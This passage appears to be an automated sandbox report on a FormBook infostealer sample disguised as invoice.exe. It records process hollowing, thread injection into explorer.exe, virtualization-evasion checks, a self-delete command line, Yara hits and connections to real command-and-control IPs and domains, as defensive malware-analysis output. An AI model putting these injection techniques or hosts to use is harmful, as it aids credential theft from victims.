          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044340E1 mov eax, dword ptr fs:[00000030h]6_2_044340E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044340E1 mov eax, dword ptr fs:[00000030h]6_2_044340E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044358EC mov eax, dword ptr fs:[00000030h]6_2_044358EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439080 mov eax, dword ptr fs:[00000030h]6_2_04439080
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B3884 mov eax, dword ptr fs:[00000030h]6_2_044B3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B3884 mov eax, dword ptr fs:[00000030h]6_2_044B3884
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A0 mov eax, dword ptr fs:[00000030h]6_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A0 mov eax, dword ptr fs:[00000030h]6_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A0 mov eax, dword ptr fs:[00000030h]6_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A0 mov eax, dword ptr fs:[00000030h]6_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A0 mov eax, dword ptr fs:[00000030h]6_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044620A0 mov eax, dword ptr fs:[00000030h]6_2_044620A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044790AF mov eax, dword ptr fs:[00000030h]6_2_044790AF
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446F0BF mov ecx, dword ptr fs:[00000030h]6_2_0446F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446F0BF mov eax, dword ptr fs:[00000030h]6_2_0446F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446F0BF mov eax, dword ptr fs:[00000030h]6_2_0446F0BF
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445B944 mov eax, dword ptr fs:[00000030h]6_2_0445B944
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445B944 mov eax, dword ptr fs:[00000030h]6_2_0445B944
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443C962 mov eax, dword ptr fs:[00000030h]6_2_0443C962
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443B171 mov eax, dword ptr fs:[00000030h]6_2_0443B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443B171 mov eax, dword ptr fs:[00000030h]6_2_0443B171
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439100 mov eax, dword ptr fs:[00000030h]6_2_04439100
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439100 mov eax, dword ptr fs:[00000030h]6_2_04439100
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439100 mov eax, dword ptr fs:[00000030h]6_2_04439100
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04454120 mov eax, dword ptr fs:[00000030h]6_2_04454120
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04454120 mov eax, dword ptr fs:[00000030h]6_2_04454120
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04454120 mov eax, dword ptr fs:[00000030h]6_2_04454120
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04454120 mov eax, dword ptr fs:[00000030h]6_2_04454120
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04454120 mov ecx, dword ptr fs:[00000030h]6_2_04454120
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446513A mov eax, dword ptr fs:[00000030h]6_2_0446513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446513A mov eax, dword ptr fs:[00000030h]6_2_0446513A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443B1E1 mov eax, dword ptr fs:[00000030h]6_2_0443B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443B1E1 mov eax, dword ptr fs:[00000030h]6_2_0443B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443B1E1 mov eax, dword ptr fs:[00000030h]6_2_0443B1E1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044C41E8 mov eax, dword ptr fs:[00000030h]6_2_044C41E8
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446A185 mov eax, dword ptr fs:[00000030h]6_2_0446A185
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445C182 mov eax, dword ptr fs:[00000030h]6_2_0445C182
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04462990 mov eax, dword ptr fs:[00000030h]6_2_04462990
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044661A0 mov eax, dword ptr fs:[00000030h]6_2_044661A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044661A0 mov eax, dword ptr fs:[00000030h]6_2_044661A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F49A4 mov eax, dword ptr fs:[00000030h]6_2_044F49A4
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F49A4 mov eax, dword ptr fs:[00000030h]6_2_044F49A4
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F49A4 mov eax, dword ptr fs:[00000030h]6_2_044F49A4
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F49A4 mov eax, dword ptr fs:[00000030h]6_2_044F49A4
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B69A6 mov eax, dword ptr fs:[00000030h]6_2_044B69A6
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B51BE mov eax, dword ptr fs:[00000030h]6_2_044B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B51BE mov eax, dword ptr fs:[00000030h]6_2_044B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B51BE mov eax, dword ptr fs:[00000030h]6_2_044B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B51BE mov eax, dword ptr fs:[00000030h]6_2_044B51BE
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439240 mov eax, dword ptr fs:[00000030h]6_2_04439240
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439240 mov eax, dword ptr fs:[00000030h]6_2_04439240
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439240 mov eax, dword ptr fs:[00000030h]6_2_04439240
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04439240 mov eax, dword ptr fs:[00000030h]6_2_04439240
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FEA55 mov eax, dword ptr fs:[00000030h]6_2_044FEA55
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044C4257 mov eax, dword ptr fs:[00000030h]6_2_044C4257
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044EB260 mov eax, dword ptr fs:[00000030h]6_2_044EB260
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044EB260 mov eax, dword ptr fs:[00000030h]6_2_044EB260
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04508A62 mov eax, dword ptr fs:[00000030h]6_2_04508A62
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0447927A mov eax, dword ptr fs:[00000030h]6_2_0447927A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04448A0A mov eax, dword ptr fs:[00000030h]6_2_04448A0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04435210 mov eax, dword ptr fs:[00000030h]6_2_04435210
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04435210 mov ecx, dword ptr fs:[00000030h]6_2_04435210
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04435210 mov eax, dword ptr fs:[00000030h]6_2_04435210
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04435210 mov eax, dword ptr fs:[00000030h]6_2_04435210
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443AA16 mov eax, dword ptr fs:[00000030h]6_2_0443AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443AA16 mov eax, dword ptr fs:[00000030h]6_2_0443AA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04453A1C mov eax, dword ptr fs:[00000030h]6_2_04453A1C
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FAA16 mov eax, dword ptr fs:[00000030h]6_2_044FAA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FAA16 mov eax, dword ptr fs:[00000030h]6_2_044FAA16
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04474A2C mov eax, dword ptr fs:[00000030h]6_2_04474A2C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00315367 GetProcessHeap,0_2_00315367
          Source: C:\Users\user\Desktop\invoice.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00312537 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00312537
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00312506 SetUnhandledExceptionFilter,0_2_00312506
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00312537 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00312537
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00312506 SetUnhandledExceptionFilter,1_2_00312506

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 109.73.164.114 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 68.66.248.44 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Users\user\Desktop\invoice.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\invoice.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: B0000Jump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Users\user\Desktop\invoice.exe C:\Users\user\Desktop\invoice.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\invoice.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.665199204.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000002.924109355.0000000001080000.00000002.00000001.sdmp, control.exe, 00000006.00000002.924221104.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.935436486.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000006.00000002.924221104.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.924109355.0000000001080000.00000002.00000001.sdmp, control.exe, 00000006.00000002.924221104.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.924109355.0000000001080000.00000002.00000001.sdmp, control.exe, 00000006.00000002.924221104.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.678863688.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00314831 cpuid 0_2_00314831
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_0031F994
          Source: C:\Users\user\Desktop\invoice.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0031D99C
          Source: C:\Users\user\Desktop\invoice.exeCode function: EnumSystemLocalesW,0_2_0031420B
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0031EA7A
          Source: C:\Users\user\Desktop\invoice.exeCode function: GetLocaleInfoW,0_2_00314248
          Source: C:\Users\user\Desktop\invoice.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0031FABE
          Source: C:\Users\user\Desktop\invoice.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_00316284
          Source: C:\Users\user\Desktop\invoice.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0031FB6B
          Source: C:\Users\user\Desktop\invoice.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_0031F3EB
          Source: C:\Users\user\Desktop\invoice.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_0031FC3F
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LcidFromHexString,GetLocaleInfoW,0_2_0031F5AF
          Source: C:\Users\user\Desktop\invoice.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_0031D594
          Source: C:\Users\user\Desktop\invoice.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_0030E5FA
          Source: C:\Users\user\Desktop\invoice.exeCode function: EnumSystemLocalesW,0_2_0031F65F
          Source: C:\Users\user\Desktop\invoice.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0031F69F
          Source: C:\Users\user\Desktop\invoice.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_0031F71C
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_0031F79F
          Source: C:\Users\user\Desktop\invoice.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_0031DF9E
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,1_2_0031F994
          Source: C:\Users\user\Desktop\invoice.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,1_2_0031D99C
          Source: C:\Users\user\Desktop\invoice.exeCode function: EnumSystemLocalesW,1_2_0031420B
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_0031EA7A
          Source: C:\Users\user\Desktop\invoice.exeCode function: GetLocaleInfoW,1_2_00314248
          Source: C:\Users\user\Desktop\invoice.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0031FABE
          Source: C:\Users\user\Desktop\invoice.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,1_2_00316284
          Source: C:\Users\user\Desktop\invoice.exeCode function: GetLocaleInfoW,_GetPrimaryLen,1_2_0031FB6B
          Source: C:\Users\user\Desktop\invoice.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,1_2_0031F3EB
          Source: C:\Users\user\Desktop\invoice.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,1_2_0031FC3F
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LcidFromHexString,GetLocaleInfoW,1_2_0031F5AF
          Source: C:\Users\user\Desktop\invoice.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,1_2_0031D594
          Source: C:\Users\user\Desktop\invoice.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,1_2_0030E5FA
          Source: C:\Users\user\Desktop\invoice.exeCode function: EnumSystemLocalesW,1_2_0031F65F
          Source: C:\Users\user\Desktop\invoice.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_0031F69F
          Source: C:\Users\user\Desktop\invoice.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,1_2_0031F71C
          Source: C:\Users\user\Desktop\invoice.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,1_2_0031F79F
          Source: C:\Users\user\Desktop\invoice.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_0031DF9E
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00317A48 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00317A48

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.694812494.0000000000B70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923792314.0000000002380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694586179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.923314997.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.694843913.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.662094900.00000000029D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.invoice.exe.29d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.invoice.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Application Shimming1Process Injection512Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery122VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 321016 Sample: invoice.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Yara detected FormBook 2->39 41 4 other signatures 2->41 10 invoice.exe 2->10         started        process3 signatures4 49 Maps a DLL or memory area into another process 10->49 51 Tries to detect virtualization through RDTSC time measurements 10->51 13 invoice.exe 10->13         started        process5 signatures6 53 Modifies the context of a thread in another process (thread injection) 13->53 55 Maps a DLL or memory area into another process 13->55 57 Sample uses process hollowing technique 13->57 59 Queues an APC in another process (thread injection) 13->59 16 explorer.exe 13->16 injected process7 dnsIp8 27 laborexchanges.com 34.102.136.180, 49764, 80 GOOGLEUS United States 16->27 29 rmcfoods.com 109.73.164.114, 49767, 80 DIMENOCUS United Kingdom 16->29 31 5 other IPs or domains 16->31 33 System process connects to network (likely due to code injection or exploit) 16->33 20 control.exe 16->20         started        signatures9 process10 signatures11 43 Modifies the context of a thread in another process (thread injection) 20->43 45 Maps a DLL or memory area into another process 20->45 47 Tries to detect virtualization through RDTSC time measurements 20->47 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

